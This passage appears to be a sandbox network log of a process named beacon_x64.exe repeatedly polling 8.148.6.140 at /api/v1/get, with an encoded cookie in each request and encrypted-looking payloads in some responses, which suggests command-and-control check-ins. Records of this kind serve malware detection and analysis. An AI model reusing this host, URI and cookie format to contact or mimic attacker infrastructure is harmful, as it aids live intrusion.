Jan 10, 2025 09:27:05.718764067 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.6	50059	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:27:06.688679934 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.6	50060	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:27:10.843080044 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:27:12.438888073 CET	184	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:27:12 GMT Server: nginx Content-Length: 64 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache
Jan 10, 2025 09:27:12.439081907 CET	64	IN	Data Raw: 73 38 58 74 31 49 39 2f 6a 35 51 53 36 65 39 79 37 34 4e 4e 33 61 77 41 51 6a 39 47 61 57 73 36 30 73 73 5a 34 36 67 45 31 67 51 7a 5a 75 54 58 61 37 30 67 39 68 2f 49 48 65 36 73 4d 6c 33 34 Data Ascii: s8Xt1I9/j5QS6e9y74NN3awAQj9GaWs60ssZ46gE1gQzZuTXa70g9h/IHe6sMl34

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.6	50061	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:27:12.562727928 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:27:13.507354021 CET	465	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:27:13 GMT Server: nginx Content-Length: 280 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 57 62 62 53 41 51 46 45 46 65 6e 4a 64 32 53 57 7a 75 52 4c 4f 37 37 49 41 30 6b 63 4c 32 39 58 2f 6c 4a 73 6e 75 36 47 44 32 43 61 73 37 53 4e 42 2b 41 31 37 66 30 69 51 5a 6d 73 57 69 69 51 5a 58 38 55 2b 76 56 32 61 43 36 6f 4a 6c 2f 54 63 63 6e 36 49 64 39 34 44 48 66 76 54 66 5a 48 68 38 58 52 41 39 31 36 63 54 64 4d 36 38 39 68 77 59 76 77 50 74 36 31 7a 4f 52 73 4a 71 37 51 69 43 53 2b 71 73 57 73 68 4c 46 73 75 50 48 34 4c 33 36 76 72 6f 63 68 62 79 42 50 67 6a 6a 68 6f 76 4d 56 2b 59 76 6e 67 71 71 2b 31 79 4c 2f 5a 7a 69 57 6f 4a 71 64 72 62 61 48 35 62 42 41 39 4f 37 4b 58 52 41 54 50 4b 74 4d 6f 52 4f 4b 6d 42 4e 4f 63 71 38 68 59 6b 4b 73 6c 76 37 36 67 63 78 66 4a 57 59 54 4a 35 76 2f 2b 72 6d 58 31 49 38 45 67 69 35 73 54 38 5a 35 73 33 32 43 54 79 4f 74 74 67 53 70 41 46 36 66 63 48 41 45 69 44 48 42 42 67 3d 3d Data Ascii: WbbSAQFEFenJd2SWzuRLO77IA0kcL29X/lJsnu6GD2Cas7SNB+A17f0iQZmsWiiQZX8U+vV2aC6oJl/Tccn6Id94DHfvTfZHh8XRA916cTdM689hwYvwPt61zORsJq7QiCS+qsWshLFsuPH4L36vrochbyBPgjjhovMV+Yvngqq+1yL/ZziWoJqdrbaH5bBA9O7KXRATPKtMoROKmBNOcq8hYkKslv76gcxfJWYTJ5v/+rmX1I8Egi5sT8Z5s32CTyOttgSpAF6fcHAEiDHBBg==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.6	50062	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:27:13.624799967 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.6	50063	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:27:14.594922066 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.6	50064	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:27:18.721239090 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.6	50065	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:27:19.704741955 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:27:20.699805975 CET	293	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:27:20 GMT Server: nginx Content-Length: 108 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 63 37 72 77 42 71 43 4b 4b 57 52 43 6d 4e 46 6d 49 67 7a 4f 37 6a 31 70 7a 33 44 46 67 38 67 56 4a 6c 72 50 37 69 64 35 6f 6e 32 33 7a 4e 32 50 38 4b 2f 6c 63 35 70 4b 5a 43 39 33 56 68 66 4d 6e 52 31 5a 6f 37 2f 59 34 50 74 6c 38 50 57 34 72 4b 4d 78 64 6f 4f 70 78 33 52 72 4a 63 55 4a 75 36 42 59 4c 68 7a 5a 78 42 63 3d Data Ascii: c7rwBqCKKWRCmNFmIgzO7j1pz3DFg8gVJlrP7id5on23zN2P8K/lc5pKZC93VhfMnR1Zo7/Y4Ptl8PW4rKMxdoOpx3RrJcUJu6BYLhzZxBc=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.6	50066	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:27:20.812406063 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:27:21.818121910 CET	401	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:27:21 GMT Server: nginx Content-Length: 216 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 4d 50 58 52 6a 67 52 4d 43 49 53 2b 74 61 2b 73 78 53 48 49 2f 67 34 65 59 49 4c 32 32 35 38 77 2f 52 43 46 73 41 76 64 75 59 70 45 41 58 54 59 62 30 65 4f 32 53 62 44 70 59 6e 30 6f 6f 32 77 54 74 35 4a 66 37 2b 50 72 72 6a 57 37 61 74 59 47 43 4f 4b 34 5a 58 54 6e 48 79 70 41 72 6a 57 55 41 4a 6b 53 6d 32 54 77 56 51 61 67 48 43 4a 69 67 4a 43 56 5a 48 6b 33 48 49 56 4b 4d 6d 7a 51 37 37 68 4d 4a 65 34 34 6c 55 7a 6b 6e 4e 61 70 2b 76 31 59 34 78 46 34 44 6e 48 73 6e 5a 76 51 59 51 68 6f 52 64 6e 31 53 53 39 57 55 4b 74 71 4b 6b 4a 2b 58 2f 7a 41 46 53 4c 6a 70 56 66 72 38 6a 77 4e 41 58 50 74 4b 6e 4f 6f 4d 54 76 34 46 63 4d 76 67 3d 3d Data Ascii: MPXRjgRMCIS+ta+sxSHI/g4eYIL2258w/RCFsAvduYpEAXTYb0eO2SbDpYn0oo2wTt5Jf7+PrrjW7atYGCOK4ZXTnHypArjWUAJkSm2TwVQagHCJigJCVZHk3HIVKMmzQ77hMJe44lUzknNap+v1Y4xF4DnHsnZvQYQhoRdn1SS9WUKtqKkJ+X/zAFSLjpVfr8jwNAXPtKnOoMTv4FcMvg==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.6	50067	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:27:21.936686993 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.6	50068	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:27:22.922439098 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:27:24.454638004 CET	313	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:27:24 GMT Server: nginx Content-Length: 128 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 54 39 4a 6b 6f 35 66 73 6f 2f 4e 64 30 6b 36 6e 36 39 38 75 45 43 2f 38 44 36 58 38 68 4a 45 4a 32 5a 72 37 31 47 69 65 59 38 48 70 61 50 37 76 39 4c 44 76 69 30 49 49 37 31 4e 6c 5a 51 6d 38 50 79 34 53 63 55 6b 50 71 38 6e 32 50 78 68 6a 79 70 33 43 69 30 42 72 77 51 31 35 52 68 38 72 30 6c 36 2b 38 35 65 43 39 6d 6f 74 6c 71 4e 64 6d 35 78 58 31 48 67 49 77 6a 4d 64 6a 6e 7a 74 Data Ascii: T9Jko5fso/Nd0k6n698uEC/8D6X8hJEJ2Zr71GieY8HpaP7v9LDvi0II71NlZQm8Py4ScUkPq8n2Pxhjyp3Ci0BrwQ15Rh8r0l6+85eC9motlqNdm5xX1HgIwjMdjnzt

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.6	50069	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:27:24.583391905 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.6	50070	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:27:25.629178047 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:27:26.626981020 CET	313	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:27:26 GMT Server: nginx Content-Length: 128 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 2b 6d 4b 47 38 6b 64 59 45 72 74 6d 61 2b 4c 65 63 35 4b 37 38 7a 4e 62 31 76 55 4b 72 77 4c 71 75 72 39 77 2f 32 79 2b 75 54 52 4d 53 34 47 35 32 5a 7a 62 72 47 48 50 78 39 41 6c 48 38 34 48 59 34 4c 4d 4d 42 41 65 46 74 73 58 73 46 65 6b 68 30 78 58 67 65 2b 54 4e 5a 67 59 76 2b 31 59 73 4b 4f 57 76 30 33 77 74 41 43 50 48 47 61 6a 69 5a 41 4b 72 4f 4f 67 39 67 57 69 51 77 30 4c Data Ascii: +mKG8kdYErtma+Lec5K78zNb1vUKrwLqur9w/2y+uTRMS4G52ZzbrGHPx9AlH84HY4LMMBAeFtsXsFekh0xXge+TNZgYv+1YsKOWv03wtACPHGajiZAKrOOg9gWiQw0L

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.6	50071	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:27:26.755108118 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.6	50072	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:27:27.718604088 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:27:31.663121939 CET	465	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:27:31 GMT Server: nginx Content-Length: 280 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 36 6c 6f 39 2f 70 58 31 51 6b 69 7a 34 43 55 72 67 68 34 4b 34 51 42 33 35 32 4a 45 35 45 41 4e 39 4a 48 58 46 41 79 36 73 4b 52 66 49 6e 52 4f 66 58 68 39 79 6a 2f 6e 69 2b 50 6a 61 42 42 4e 53 42 4a 74 31 5a 56 57 6f 6e 65 31 50 2b 6d 4d 70 43 4a 7a 2b 4d 6a 6e 56 69 41 4e 4f 65 65 7a 44 56 7a 39 54 53 61 38 33 77 55 47 39 36 35 56 69 52 77 64 6c 6c 47 50 32 49 42 6c 42 32 47 49 66 64 55 41 50 4a 70 4d 4c 76 38 79 57 2b 5a 49 50 2f 4a 6d 43 4f 43 4c 54 74 53 53 5a 34 57 48 4a 34 33 67 6f 49 38 50 37 48 74 7a 71 34 52 62 64 75 61 4d 55 5a 57 31 62 56 51 72 6c 52 57 4e 32 4c 4f 38 71 4c 33 55 4b 46 53 4e 2f 6d 6a 57 71 4f 41 4b 61 6d 4e 47 76 71 78 4e 38 33 42 5a 6e 70 45 35 77 59 52 57 67 33 38 67 59 34 78 39 2f 4b 67 42 39 4a 64 4b 4c 63 50 43 68 2b 6c 4f 36 6b 48 53 50 51 70 4f 63 4b 45 52 4f 41 31 65 32 47 46 55 4d 77 3d 3d Data Ascii: 6lo9/pX1Qkiz4CUrgh4K4QB352JE5EAN9JHXFAy6sKRfInROfXh9yj/ni+PjaBBNSBJt1ZVWone1P+mMpCJz+MjnViANOeezDVz9TSa83wUG965ViRwdllGP2IBlB2GIfdUAPJpMLv8yW+ZIP/JmCOCLTtSSZ4WHJ43goI8P7Htzq4RbduaMUZW1bVQrlRWN2LO8qL3UKFSN/mjWqOAKamNGvqxN83BZnpE5wYRWg38gY4x9/KgB9JdKLcPCh+lO6kHSPQpOcKEROA1e2GFUMw==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.6	50073	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:27:31.792303085 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.6	50074	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:27:32.784753084 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.6	50075	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:27:33.797542095 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.6	50076	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:27:37.990502119 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.6	50077	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
